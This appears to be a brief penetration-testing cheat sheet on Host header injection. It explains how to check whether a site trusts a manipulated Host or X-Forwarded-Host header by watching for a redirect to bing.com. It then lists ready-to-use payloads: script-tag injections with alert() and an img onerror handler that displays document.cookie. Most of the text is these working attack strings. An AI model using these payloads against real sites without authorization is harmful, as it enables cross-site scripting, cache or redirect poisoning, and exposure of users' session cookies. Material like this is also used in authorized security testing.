Host Header Injection
Last updated
Last updated
Change Host parameter in request for , if it redirects to bing, then its vulnerable.
Try also setting localhost.
Host: bing.com"></script><script>alert(1)</script><"
Host: <script>alert('foo');</script>.example.com
X-Forwarded-Host: bing.com"><img src/onerror=prompt(document.cookie)>